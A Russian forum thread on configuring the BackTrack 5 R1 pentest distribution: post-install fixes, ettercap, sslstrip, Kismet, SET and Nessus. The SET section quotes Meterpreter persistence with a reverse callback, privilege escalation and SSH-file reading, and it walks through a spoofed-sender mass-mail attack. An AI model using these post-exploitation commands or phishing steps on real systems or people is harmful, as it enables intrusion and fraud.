BackTrack5R1 После установки BackTrack (основные действия и фиксим баги) На носу R2 версия, тем не менее пройдусь по BackTrack R1. Установка завершена первым делом естественно меняем пароль рута на свой(по умолчанию toor): passwd root настраиваем сеть, либо через редактирование gedit /etc/network/interfaces либо если bridge ADSL pppoeconf либо юзаем Wicd Network Manager Wicd выдает ошибку фиксим: dpkg-reconfigure wicd update-rc.d wicd defaults Для начала можно поставить фронтенд apt-get install firestarter настроить его или настроить ip-tables обновляемся apt-get update apt-get upgrade обновляем софт и svn индивидуально ======================== Перезагружаемся и фиксим баги: 1. Ettercap заодно можно поставить synaptic apt-get install synaptic apt-get install gdebi скачаем 2 пакета https://launchpad.net/%7Etimothy-redaelli/+archive/drizzt/+build/1758139/+files/ettercap-common_0.7.3-1.4ubuntu1drizzt1_i386.deb https://launchpad.net/%7Etimothy-redaelli/+archive/drizzt/+build/1758139/+files/ettercap-gtk_0.7.3-1.4ubuntu1drizzt1_i386.deb и поставим dpkg -i /root/ettercap-common_0.7.3-1.4ubuntu1drizzt1_i386.deb dpkg -i /root/ettercap-gtk_0.7.3-1.4ubuntu1drizzt1_i386.deb 2. NVIDIA драйвера gedit /etc/modprobe.d/blacklist.conf добавляем эти строчки в конфиг: blacklist vga16fb blacklist nouveau blacklist rivafb blacklist nvidiafb blacklist rivatv затем apt-get –purge remove nvidia-* Перезагрузка add-apt-repository ppa:ubuntu-x-swat/x-updates apt-get update && apt-get install nvidia-current nvidia-current-modaliases nvidia-settings 3. Звук не регулируется и т.д. System->Preferences -> Startup Applications Кликаем ‘Add’ Копируем Name: Pulseaudio daemon Command:/usr/bin/pulseaudio Comment: Start the sound daemon Заканчиваем сеанс пользователя рут и заходим снова 4. SSLSTRIP Качаем: http://www.thoughtcrime.org/software/sslstrip/ распаковываем и ... tar -zxvf sslstrip-0.9.tar.gz cd sslstrip-0.9 python setup.py install После Cleaning up… будет работать Источник: http://ewangi.info/660/backtrack-5r1-first-hot-review-bugs-fixes/ ======================== Отмена ввода пароля и startx (по желанию) gedit /etc/rc.local просто добавьте: su -c root startx сохранить и пере загрузится или установите rungetty... apt-get install rungetty gedit /etc/init/tty1.conf добавьте перед exec /sbin/getty -8 38400 tty1 " # " и строчку exec /sbin/rungetty tty1 --autologin root сохранить, открыть gedit /root/.bash_profile добавить startx сохранить и пере загрузится ======================== Обновить дистрибутив: apt-get update apt-get dist-upgrade ramzes_01®Guidelines for Determining Copy Rights https://forum.antichat.ru/thread321087.html Гуру не являюсь и не претендую - уточнения, дополнения и предложения только приветствуются
не проще свою сборку сделать) больше половины там шлак какойто. Например на archinux? В AUR почти всё есть
Kismet Настройка Kismet перед использованием. Для того чтобы- начать пользоваться kismet нам необходимо поправить kismet.conf. gedit /usr/local/etc/kismet.conf Что нас здесь может заинтересовать: Code: 1. Прописываем расположение папки куда будет сохранятся дамп # Prefix of where we log (as used in the logtemplate later) logprefix=/root/kismetlog соответственно создадим папку mkdir /root/kismetlog 2.Настраиваем работу со своим WiFi адаптером # ncsource=interface:options # for example: ncsource=интерфейс:name=адаптер,type=драйвер,channel=канал например ncsource=wlan0:name=Atheros,type=ath5k,channel=7 3. Устраняем GPS # Do we have a GPS? #gps=true # Do we use a locally serial attached GPS, or use a gpsd server? # (Pick only one) #gpstype=gpsd # gpstype=serial # What serial device do we look for the GPS on? #gpsdevice=/dev/rfcomm0 # Host: port that GPSD is running on. This can be localhost OR remote! #gpshost=localhost:2947 # Do we lock the mode? This overrides coordinates of lock "0", which will # generate some bad information until you get a GPS lock, but it will # fix problems with GPS units with broken NMEA that report lock 0 #gpsmodelock=false # Do we try to reconnect if we lose our link to the GPS, or do we just # let it die and be disabled? #gpsreconnect=true Можно поправить еще как минимум 2 позиции, но в принципе и этого достаточно, можно использовать. ramzes_01®Guidelines for Determining Copy Rights https://forum.antichat.ru/thread321087.html
Set Настройка Set перед использованием. Для того что-бы начать пользоваться нам нужно отредактировать set_config gedit /pentest/exploits/set/config/set_config Итак, здесь может понадобится время от времени периодически править содержимое Code: # metasploit # DEFINE THE PATH TO METASPLOIT HERE, FOR EXAMPLE /pentest/exploits/framework3 METASPLOIT_PATH=/opt/framework3/msf3(директория расположения) # HOW MANY TIMES SET SHOULD ENCODE A PAYLOAD IF YOU ARE USING STANDARD METASPLOIT ENCODING OPTIONS ENCOUNT=4 (сколько раз кодируется payload) # IF THIS OPTION IS SET, THE METASPLOIT PAYLOADS WILL AUTOMATICALLY MIGRATE TO # NOTEPAD ONCE THE APPLET IS EXECUTED. THIS IS BENEFICIAL IF THE VICTIM CLOSES # THE BROWSER HOWEVER CAN INTRODUCE BUGGY RESULTS WHEN AUTO MIGRATING. AUTO_MIGRATE=OFF(или ON) # HERE WE CAN RUN MULTIPLE METERPRETER SCRIPTS ONCE A SESSION IS ACTIVE. THIS # MAY BE IMPORTANT IF WE ARE SLEEPING AND NEED TO RUN PERSISTENCE, TRY TO ELEVATE # PERMISSIONS AND OTHER TASKS IN AN AUTOMATED FASHION. FIRST TURN THIS TRIGGER ON # THEN CONFIGURE THE FLAGS. NOTE THAT YOU NEED TO SEPERATE THE COMMANDS BY A ; METERPRETER_MULTI_SCRIPT=OFF(или ON) LINUX_METERPRETER_MULTI_SCRIPT=OFF(или ON) # WHAT COMMANDS DO YOU WANT TO RUN ONCE A METERPRETER SESSION HAS BEEN ESTABLISHED. # BE SURE IF YOU WANT MULTIPLE COMMANDS TO SEPERATE WITH A ;. FOR EXAMPLE YOU COULD DO # run getsystem;run hashdump;run persistence TO RUN THREE DIFFERENT COMMANDS METERPRETER_MULTI_COMMANDS=run persistence -r 192.168.1.5 -p 21 -i 300 -X -A;getsystem LINUX_METERPRETER_MULTI_COMMANDS=uname;id;cat ~/.ssh/known_hosts # THIS IS THE PORT THAT IS USED FOR THE IFRAME INJECTION USING THE METASPLOIT BROWSER ATTACKS # BY DEFAULT THIS PORT IS 8080 HOWEVER EGRESS FILTERING MAY BLOCK THIS. MAY WANT TO ADJUST TO # SOMETHING LIKE 21 OR 53 METASPLOIT_IFRAME_PORT=8080 (номер порта может использоваться 8118 если tor или VPN или SSH) # ettercap # DEFINE TO USE ETTERCAP OR NOT WHEN USING #WEBSITE ATTACK ONLY SET TO ON AND OFF ETTERCAP=OFF(или ON) # ETTERCAP HOME DIRECTORY (NEEDED FOR DNS_SPOOF) ETTERCAP_PATH=/usr/share/ettercap # SPECIFY WHAT INTERFACE YOU WANT ETTERCAP OR DSNIFF TO LISTEN ON, IF NOTHING WILL DEFAULT # EXAMPLE: ETTERCAP_INTERFACE=wlan0 ETTERCAP_DSNIFF_INTERFACE=eth0 (прописываем интерфейс используемый сниферами) # DEFINE TO USE DSNIFF OR NOT WHEN USING WEBSITE ATTACK ONLY SET TO ON AND OFF # dsniff # IF DSNIFF IS SET TO ON, ETTERCAP WILL AUTOMATICALLY BE DISABLED. DSNIFF=OFF(или ON) # AUTO DETECTION OF IP ADDRESS INTERFACE UTILIZING GOOGLE, SET THIS ON IF YOU WANT # SET TO AUTODETECT YOUR INTERFACE AUTO_DETECT=ON(или OFF) # SENDMAIL ON OR OFF FOR SPOOFING EMAIL ADDRESSES #Sendmail SENDMAIL=OFF(или ON) #Email provider # EMAIL PROVIDER LIST SUPPORTS GMAIL, HOTMAIL, AND YAHOO. # SIMPLY CHANGE THE IT TO THE PROVIDER YOU WANT TOUSE. EMAIL_PROVIDER=GMAIL(HOTMAIL, YAHOO) и т.д. Т.е. если нам нужно прописать директорию (смена при обновлении например), включить или выключить, службу утилиту, снифер, сертификат и т.д. #Prosto prochitay и выстави нужные параметры По sendmail в BackTrack 5 установка происходила автоматом при активации: SENDMAIL=ON в BackTrack 5 R1 я ставил ее сам: apt-get install sendmail Простой пример применения: 1) Social-Engineering Attacks 5) Mass Mailer Attack Start Sendmail? [yes|no]:yes What do you want to do: 1. E-Mail Attack Single Email Address (одно одному) или 2. E-Mail Attack Mass Mailer (массовая рассылка) Send email to:кому@мыло 2. Use your own server or open relay From address (ex: [email protected]):отправитель@мыло Flag this message/s as high priority? [yes|no]:yes Email subject:Название письма Send the message as html or plain? 'h' or 'p' [p]:h Enter the body of the message, hit return for a new line. Control+c when finished: Привет, как дела - тело письма ramzes_01®Guidelines for Determining Copy Rights https://forum.antichat.ru/thread321087.html
Nessus 1. Зарегистрироваться на сайте http://www.nessus.org/products/nessus/nessus-plugins/obtain-an-activation-code выбрав Using Nessus at Home? или ... получить письмо и ввести полученный код открыв терминал: /opt/nessus/bin/-fetch --register кодд-кодд-кодд-кодд Резерв Nessus = продолжение следует =
Пробегают тут еще порой светлые головы, которые мыслят своими мозгами. Достаточно было написать перечь софта установленного в это говно и закрыть эту тему раз и навсегда. Да вообще понимающие люди сразу оценят реальный уровень сборщика этого дерьма, который в основу взял бубну. Это не тоже самое , что предположим на генту собрать...
Некропост. По-моему какие никсы не возьми, все равно кастомизация будет тернистым путем. Подскажите, как поступить когда есть ноут с двумя видеокартами, и на нем BackTrack? Пробовал запустить nvidia, в результате чего nvidia-xconfig грохнула мне X Server. Есть подозрение на то что по дефолту стоит интеловское видео. Где его можно переключить так чтоб ничего не убить?
Если речь идёт о дискретной и интегрированной видеокартах, то, в зависимости от модели бука (точнее, материнской платы) может меняться приоритет карточек по-разному. А может и не меняться вовсе =) в самом общем случае, попробуйте покопаться в настройках BIOS, обычно там искать стоит, в первую очередь. По сабжу - как много светлых умов у нас в стране, да только без вектора =) так подумать - каждый второй - Кулибин напополам с Ломоносовым, и чуть от Менделеева =) Так что ж никто не возьмёт да не сделает свой дистриб с блэкджеком и... набором только самого нужного софта на базе генты/слака/etc? Конечно, времени нет, денег, желания, это ж надо потом поддерживать продукт, слушать критику, работать над ним... Простите, но наболело уже. Если не можете предложить что-то своё, что будет лучше - давайте улучшать то, что у нас уже есть...
